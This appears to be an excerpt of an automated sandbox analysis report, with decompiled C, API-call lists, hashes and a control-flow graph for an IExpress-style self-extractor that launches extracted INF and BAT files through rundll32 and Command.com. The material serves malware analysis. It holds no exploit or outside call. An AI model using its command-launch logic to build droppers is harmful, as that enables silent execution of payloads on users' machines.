                                                                                                                                                                                                    0x00133dd9
                                                                                                                                                                                                    0x00133ddb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133ddd
                                                                                                                                                                                                    0x00133de1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133de1
                                                                                                                                                                                                    0x00133d59
                                                                                                                                                                                                    0x00133d65
                                                                                                                                                                                                    0x00133d6a
                                                                                                                                                                                                    0x00133d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133d6e
                                                                                                                                                                                                    0x00133d75
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133d8f
                                                                                                                                                                                                    0x00133d96
                                                                                                                                                                                                    0x00133d98
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133d98
                                                                                                                                                                                                    0x00133c8f
                                                                                                                                                                                                    0x00133c98
                                                                                                                                                                                                    0x00133cf1
                                                                                                                                                                                                    0x00133cf3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133cfe
                                                                                                                                                                                                    0x00133d11
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133d11
                                                                                                                                                                                                    0x00133c9c
                                                                                                                                                                                                    0x00133ca5
                                                                                                                                                                                                    0x00133ca7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133cad
                                                                                                                                                                                                    0x00133cb2
                                                                                                                                                                                                    0x00133cb7
                                                                                                                                                                                                    0x00133cc5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133ce8
                                                                                                                                                                                                    0x00133cec
                                                                                                                                                                                                    0x00133ced
                                                                                                                                                                                                    0x00133ced
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133ce8
                                                                                                                                                                                                    0x00133c9e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133c9e
                                                                                                                                                                                                    0x00133c56
                                                                                                                                                                                                    0x00133d35
                                                                                                                                                                                                    0x00133d35
                                                                                                                                                                                                    0x00133d3c
                                                                                                                                                                                                    0x00133d48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133d48
                                                                                                                                                                                                    0x00133c03
                                                                                                                                                                                                    0x00133be2
                                                                                                                                                                                                    0x00133be7
                                                                                                                                                                                                    0x00133bee
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00133C11
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00133CDC
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00138C42), ref: 00133D8F
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00133E26
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00138C42), ref: 00133EFF
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00138C42), ref: 00133F1F
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00138C42), ref: 00133F40
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,00138C42), ref: 00133F47
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00138C42), ref: 00133F76
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00138C42), ref: 00133F80
                                                                                                                                                                                                    • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00138C42), ref: 00133FC2
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                    • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
                                                                                                                                                                                                    • API String ID: 1032054927-3864516837
                                                                                                                                                                                                    • Opcode ID: f2ce2d07e63b6ded107e72a052bcc78fc89a14be85dcf018404c14623893c183
                                                                                                                                                                                                    • Instruction ID: d30e356bbcd347a183af3612b9af76d01a797f4cafee5b4e1da0efe9518a9cfc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f2ce2d07e63b6ded107e72a052bcc78fc89a14be85dcf018404c14623893c183
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 79B1F6709043019FE724DF648845B6B77E8EF94710F500A2EF9A5E75A0DB70C984CB5A
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 141 131ae8-131b2c call 131680 144 131b3b-131b40 141->144 145 131b2e-131b39 141->145 146 131b46-131b61 call 131a84 144->146 145->146 149 131b63-131b65 146->149 150 131b9f-131bc2 call 131781 call 13658a 146->150 151 131b68-131b6d 149->151 157 131bc7-131bd3 call 1366c8 150->157 151->151 153 131b6f-131b74 151->153 153->150 155 131b76-131b7b 153->155 158 131b83-131b86 155->158 159 131b7d-131b81 155->159 165 131d73-131d7f call 1366c8 157->165 166 131bd9-131bf1 CompareStringA 157->166 158->150 162 131b88-131b8a 158->162 159->158 161 131b8c-131b9d call 131680 159->161 161->157 162->150 162->161 175 131d81-131d99 CompareStringA 165->175 176 131df8-131e09 LocalAlloc 165->176 166->165 168 131bf7-131c07 GetFileAttributesA 166->168 170 131d53-131d5e 168->170 171 131c0d-131c15 168->171 173 131d64-131d6e call 1344b9 170->173 171->170 174 131c1b-131c33 call 131a84 171->174 187 131e94-131ea4 call 136ce0 173->187 189 131c50-131c61 LocalAlloc 174->189 190 131c35-131c38 174->190 175->176 181 131d9b-131da2 175->181 178 131dd4-131ddf 176->178 179 131e0b-131e1b GetFileAttributesA 176->179 178->173 183 131e67-131e73 call 131680 179->183 184 131e1d-131e1f 179->184 186 131da5-131daa 181->186 199 131e78-131e84 call 132aac 183->199 184->183 188 131e21-131e3e call 131781 184->188 186->186 191 131dac-131db4 186->191 188->199 210 131e40-131e43 188->210 189->178 198 131c67-131c72 189->198 195 131c40-131c4b call 131a84 190->195 196 131c3a 190->196 197 131db7-131dbc 191->197 195->189 196->195 197->197 204 131dbe-131dd2 LocalAlloc 197->204 205 131c74 198->205 206 131c79-131cc0 GetPrivateProfileIntA GetPrivateProfileStringA 198->206 207 131e89-131e92 199->207 204->178 211 131de1-131df3 call 13171e 204->211 205->206 208 131cc2-131ccc 206->208 209 131cf8-131d07 206->209 207->187 212 131cd3-131cf3 call 131680 * 2 208->212 213 131cce 208->213 215 131d23 209->215 216 131d09-131d21 GetShortPathNameA 209->216 210->199 214 131e45-131e65 call 1316b3 * 2 210->214 211->207 212->207 213->212 214->199 221 131d28-131d2b 215->221 216->221 224 131d32-131d4e call 13171e 221->224 225 131d2d 221->225 224->207 225->224
                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                    			E00131AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				char _v527;
                                                                                                                                                                                                    				char _v528;
                                                                                                                                                                                                    				char _v1552;
                                                                                                                                                                                                    				CHAR* _v1556;
                                                                                                                                                                                                    				int* _v1560;
                                                                                                                                                                                                    				CHAR** _v1564;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t48;
                                                                                                                                                                                                    				CHAR* _t53;
                                                                                                                                                                                                    				CHAR* _t54;
                                                                                                                                                                                                    				char* _t57;
                                                                                                                                                                                                    				char* _t58;
                                                                                                                                                                                                    				CHAR* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				signed char _t65;
                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                    				intOrPtr _t77;
                                                                                                                                                                                                    				unsigned int _t85;
                                                                                                                                                                                                    				CHAR* _t90;
                                                                                                                                                                                                    				CHAR* _t92;
                                                                                                                                                                                                    				char _t105;
                                                                                                                                                                                                    				char _t106;
                                                                                                                                                                                                    				CHAR** _t111;
                                                                                                                                                                                                    				CHAR* _t115;
                                                                                                                                                                                                    				intOrPtr* _t125;
                                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                                    				CHAR* _t132;
                                                                                                                                                                                                    				CHAR* _t135;
                                                                                                                                                                                                    				void* _t138;
                                                                                                                                                                                                    				void* _t139;
                                                                                                                                                                                                    				void* _t145;
                                                                                                                                                                                                    				intOrPtr* _t146;
                                                                                                                                                                                                    				char* _t148;
                                                                                                                                                                                                    				CHAR* _t151;
                                                                                                                                                                                                    				void* _t152;
                                                                                                                                                                                                    				CHAR* _t155;
                                                                                                                                                                                                    				CHAR* _t156;
                                                                                                                                                                                                    				void* _t157;
                                                                                                                                                                                                    				signed int _t158;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t48 =  *0x138004; // 0xe764604f
                                                                                                                                                                                                    				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                    				_t108 = __ecx;
                                                                                                                                                                                                    				_v1564 = _a4;
                                                                                                                                                                                                    				_v1560 = _a8;
                                                                                                                                                                                                    				E00131680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                    				if(_v528 != 0x22) {
                                                                                                                                                                                                    					_t135 = " ";
                                                                                                                                                                                                    					_t53 =  &_v528;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t135 = "\"";
                                                                                                                                                                                                    					_t53 =  &_v527;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t111 =  &_v1556;
                                                                                                                                                                                                    				_v1556 = _t53;
                                                                                                                                                                                                    				_t54 = E00131A84(_t111, _t135);
                                                                                                                                                                                                    				_t156 = _v1556;
                                                                                                                                                                                                    				_t151 = _t54;
                                                                                                                                                                                                    				if(_t156 == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_push(_t111);
                                                                                                                                                                                                    					E00131781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                    					E0013658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t132 = _t156;
                                                                                                                                                                                                    					_t148 =  &(_t132[1]);
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t105 =  *_t132;
                                                                                                                                                                                                    						_t132 =  &(_t132[1]);
                                                                                                                                                                                                    					} while (_t105 != 0);
                                                                                                                                                                                                    					_t111 = _t132 - _t148;
                                                                                                                                                                                                    					if(_t111 < 3) {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t106 = _t156[1];
                                                                                                                                                                                                    					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                    						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                    							goto L12;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L11;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						E00131680( &_v268, 0x104, _t156);
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t138 = 0x2e;
                                                                                                                                                                                                    						_t57 = E001366C8(_t156, _t138);
                                                                                                                                                                                                    						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                    							_t139 = 0x2e;
                                                                                                                                                                                                    							_t115 = _t156;
                                                                                                                                                                                                    							_t58 = E001366C8(_t115, _t139);
                                                                                                                                                                                                    							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									goto L43;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                    								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                    									E00131680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_push(_t115);
                                                                                                                                                                                                    									_t108 = 0x400;
                                                                                                                                                                                                    									E00131781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                    									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                    										E001316B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                    										E001316B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t140 = _t156;
                                                                                                                                                                                                    								 *_t156 = 0;
                                                                                                                                                                                                    								E00132AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                    								goto L53;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t108 = "Command.com /c %s";
                                                                                                                                                                                                    								_t125 = "Command.com /c %s";
                                                                                                                                                                                                    								_t145 = _t125 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t76 =  *_t125;
                                                                                                                                                                                                    									_t125 = _t125 + 1;
                                                                                                                                                                                                    								} while (_t76 != 0);
                                                                                                                                                                                                    								_t126 = _t125 - _t145;
                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                    									E0013171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                    								_t90 = E00131A84( &_v1556, "[");
                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                    									E00131A84( &_v1556, "]");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									L43:
                                                                                                                                                                                                    									_t60 = 0;
                                                                                                                                                                                                    									_t140 = 0x4b5;
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									_push(0x10);
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                    									_push(_t60);
                                                                                                                                                                                                    									E001344B9(0, _t140);
                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                    									goto L54;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t155 = _v1556;
                                                                                                                                                                                                    									_t92 = _t155;
                                                                                                                                                                                                    									if( *_t155 == 0) {
                                                                                                                                                                                                    										_t92 = "DefaultInstall";
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									 *0x139120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                    									 *_v1560 = 1;
                                                                                                                                                                                                    									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x131140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                    										 *0x139a34 =  *0x139a34 & 0xfffffffb;
                                                                                                                                                                                                    										if( *0x139a40 != 0) {
                                                                                                                                                                                                    											_t108 = "setupapi.dll";
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t108 = "setupx.dll";
                                                                                                                                                                                                    											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_push( &_v268);
                                                                                                                                                                                                    										_push(_t155);
                                                                                                                                                                                                    										E0013171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *0x139a34 =  *0x139a34 | 0x00000004;
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										E00131680(_t108, 0x104, _t155);
                                                                                                                                                                                                    										_t140 = 0x200;
                                                                                                                                                                                                    										E00131680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                    									return E00136CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}














































                                                                                                                                                                                                    0x00131af3
                                                                                                                                                                                                    0x00131afa
                                                                                                                                                                                                    0x00131b07
                                                                                                                                                                                                    0x00131b09
                                                                                                                                                                                                    0x00131b1a
                                                                                                                                                                                                    0x00131b20
                                                                                                                                                                                                    0x00131b2c
                                                                                                                                                                                                    0x00131b3b
                                                                                                                                                                                                    0x00131b40
                                                                                                                                                                                                    0x00131b2e
                                                                                                                                                                                                    0x00131b2e
                                                                                                                                                                                                    0x00131b33
                                                                                                                                                                                                    0x00131b33
                                                                                                                                                                                                    0x00131b46
                                                                                                                                                                                                    0x00131b4c
                                                                                                                                                                                                    0x00131b52
                                                                                                                                                                                                    0x00131b57
                                                                                                                                                                                                    0x00131b5d
                                                                                                                                                                                                    0x00131b61
                                                                                                                                                                                                    0x00131b9f
                                                                                                                                                                                                    0x00131b9f
                                                                                                                                                                                                    0x00131bb1
                                                                                                                                                                                                    0x00131bc2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131b63
                                                                                                                                                                                                    0x00131b63
                                                                                                                                                                                                    0x00131b65
                                                                                                                                                                                                    0x00131b68
                                                                                                                                                                                                    0x00131b68
                                                                                                                                                                                                    0x00131b6a
                                                                                                                                                                                                    0x00131b6b
                                                                                                                                                                                                    0x00131b6f
                                                                                                                                                                                                    0x00131b74
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131b76
                                                                                                                                                                                                    0x00131b7b
                                                                                                                                                                                                    0x00131b86
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131b8c
                                                                                                                                                                                                    0x00131b8c
                                                                                                                                                                                                    0x00131b98
                                                                                                                                                                                                    0x00131bc7
                                                                                                                                                                                                    0x00131bc9
                                                                                                                                                                                                    0x00131bcc
                                                                                                                                                                                                    0x00131bd3
                                                                                                                                                                                                    0x00131d75
                                                                                                                                                                                                    0x00131d76
                                                                                                                                                                                                    0x00131d78
                                                                                                                                                                                                    0x00131d7f
                                                                                                                                                                                                    0x00131e05
                                                                                                                                                                                                    0x00131e09
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131e12
                                                                                                                                                                                                    0x00131e1b
                                                                                                                                                                                                    0x00131e73
                                                                                                                                                                                                    0x00131e21
                                                                                                                                                                                                    0x00131e21
                                                                                                                                                                                                    0x00131e28
                                                                                                                                                                                                    0x00131e37
                                                                                                                                                                                                    0x00131e3e
                                                                                                                                                                                                    0x00131e52
                                                                                                                                                                                                    0x00131e60
                                                                                                                                                                                                    0x00131e60
                                                                                                                                                                                                    0x00131e3e
                                                                                                                                                                                                    0x00131e79
                                                                                                                                                                                                    0x00131e7b
                                                                                                                                                                                                    0x00131e84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131d9b
                                                                                                                                                                                                    0x00131d9b
                                                                                                                                                                                                    0x00131da0
                                                                                                                                                                                                    0x00131da2
                                                                                                                                                                                                    0x00131da5
                                                                                                                                                                                                    0x00131da5
                                                                                                                                                                                                    0x00131da7
                                                                                                                                                                                                    0x00131da8
                                                                                                                                                                                                    0x00131dac
                                                                                                                                                                                                    0x00131dae
                                                                                                                                                                                                    0x00131db4
                                                                                                                                                                                                    0x00131db7
                                                                                                                                                                                                    0x00131db7
                                                                                                                                                                                                    0x00131db9
                                                                                                                                                                                                    0x00131dba
                                                                                                                                                                                                    0x00131dbe
                                                                                                                                                                                                    0x00131dc3
                                                                                                                                                                                                    0x00131dce
                                                                                                                                                                                                    0x00131dd2
                                                                                                                                                                                                    0x00131deb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131df0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131dd2
                                                                                                                                                                                                    0x00131bf7
                                                                                                                                                                                                    0x00131bfe
                                                                                                                                                                                                    0x00131c07
                                                                                                                                                                                                    0x00131d55
                                                                                                                                                                                                    0x00131d5a
                                                                                                                                                                                                    0x00131d5b
                                                                                                                                                                                                    0x00131d5d
                                                                                                                                                                                                    0x00131d5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131c1b
                                                                                                                                                                                                    0x00131c1b
                                                                                                                                                                                                    0x00131c20
                                                                                                                                                                                                    0x00131c2c
                                                                                                                                                                                                    0x00131c33
                                                                                                                                                                                                    0x00131c38
                                                                                                                                                                                                    0x00131c3a
                                                                                                                                                                                                    0x00131c3a
                                                                                                                                                                                                    0x00131c40
                                                                                                                                                                                                    0x00131c4b
                                                                                                                                                                                                    0x00131c4b
                                                                                                                                                                                                    0x00131c5d
                                                                                                                                                                                                    0x00131c61
                                                                                                                                                                                                    0x00131dd4
                                                                                                                                                                                                    0x00131dd4
                                                                                                                                                                                                    0x00131dd6
                                                                                                                                                                                                    0x00131ddb
                                                                                                                                                                                                    0x00131ddc
                                                                                                                                                                                                    0x00131dde
                                                                                                                                                                                                    0x00131d64
                                                                                                                                                                                                    0x00131d64
                                                                                                                                                                                                    0x00131d67
                                                                                                                                                                                                    0x00131d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00131c67
                                                                                                                                                                                                    0x00131c67
                                                                                                                                                                                                    0x00131c6d
                                                                                                                                                                                                    0x00131c72
                                                                                                                                                                                                    0x00131c74
                                                                                                                                                                                                    0x00131c74
                                                                                                                                                                                                    0x00131c8e
                                                                                                                                                                                                    0x00131c99
                                                                                                                                                                                                    0x00131cc0
                                                                                                                                                                                                    0x00131cf8
                                                                                                                                                                                                    0x00131d07
                                                                                                                                                                                                    0x00131d23
                                                                                                                                                                                                    0x00131d09
                                                                                                                                                                                                    0x00131d14
                                                                                                                                                                                                    0x00131d1b
                                                                                                                                                                                                    0x00131d1b
                                                                                                                                                                                                    0x00131d2b
                                                                                                                                                                                                    0x00131d2d
                                                                                                                                                                                                    0x00131d2d
                                                                                                                                                                                                    0x00131d38
                                                                                                                                                                                                    0x00131d39
                                                                                                                                                                                                    0x00131d46
                                                                                                                                                                                                    0x00131cc2
                                                                                                                                                                                                    0x00131cc2
                                                                                                                                                                                                    0x00131ccc
                                                                                                                                                                                                    0x00131cce
                                                                                                                                                                                                    0x00131cce
                                                                                                                                                                                                    0x00131cdb
                                                                                                                                                                                                    0x00131ce6
                                                                                                                                                                                                    0x00131cee
                                                                                                                                                                                                    0x00131cee
                                                                                                                                                                                                    0x00131e89
                                                                                                                                                                                                    0x00131e91
                                                                                                                                                                                                    0x00131e92
                                                                                                                                                                                                    0x00131e94
                                                                                                                                                                                                    0x00131e97
                                                                                                                                                                                                    0x00131ea4
                                                                                                                                                                                                    0x00131ea4
                                                                                                                                                                                                    0x00131c61
                                                                                                                                                                                                    0x00131c07
                                                                                                                                                                                                    0x00131bd3
                                                                                                                                                                                                    0x00131b7b

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00131BE7
                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00131BFE
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 00131C57
                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00131C88
                                                                                                                                                                                                    • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00131140,00000000,00000008,?), ref: 00131CB8
                                                                                                                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00131D1B
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
